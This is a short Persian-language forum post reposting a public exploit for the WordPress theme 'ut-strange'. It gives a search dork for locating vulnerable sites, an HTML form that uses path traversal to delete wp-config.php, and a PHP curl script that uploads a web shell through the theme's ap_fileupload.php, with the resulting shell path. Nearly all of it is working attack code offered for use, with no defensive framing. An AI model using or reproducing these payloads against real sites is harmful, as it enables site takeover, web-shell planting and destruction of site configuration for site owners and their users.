توییت
آسیب پذیری برای پاک کردن فایل های موجود بر روی وردپرس مثل wp-config در پوسته ut-strange وردپرس
Remote file upload
1337day.com/exploit/22675
کد:
inurl:/wp-content/themes/ut-strange
کد:
<form action="http://127.0.0.1/wp-content/themes/ut-strange/addpress/includes/ap_fileupload.php" method="POST"> <input type="hidden" name="action" value="deletefile"> <input type="text" name="file" value="../../../wp-config.php"> <input type="submit" value="Delete It"> </form>
Remote file upload
کد:
<?php
if (!isset ($argv[1], $argv[2]))
die ("Usage : php {$argv[0]} http://127.0.0.1/ my_shell.php");
if (!file_exists ($argv[2]))
die ("Fatal Error : File \"{$argv[2]}\" Not Found...\n");
$post = array
(
"file_upload" => "@".$argv[2],
"themeroot" => "."
//,"dir"=>"."
);
$ch = curl_init ($argv[1]."/wp-content/themes/ut-strange/addpress/includes/ap_fileupload.php");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
echo $data;
?>
کد:
Shell Path : http://127.0.0.1/wp-content/themes/ut-strange/addpress/includes/[SHELL_NAME]
نظر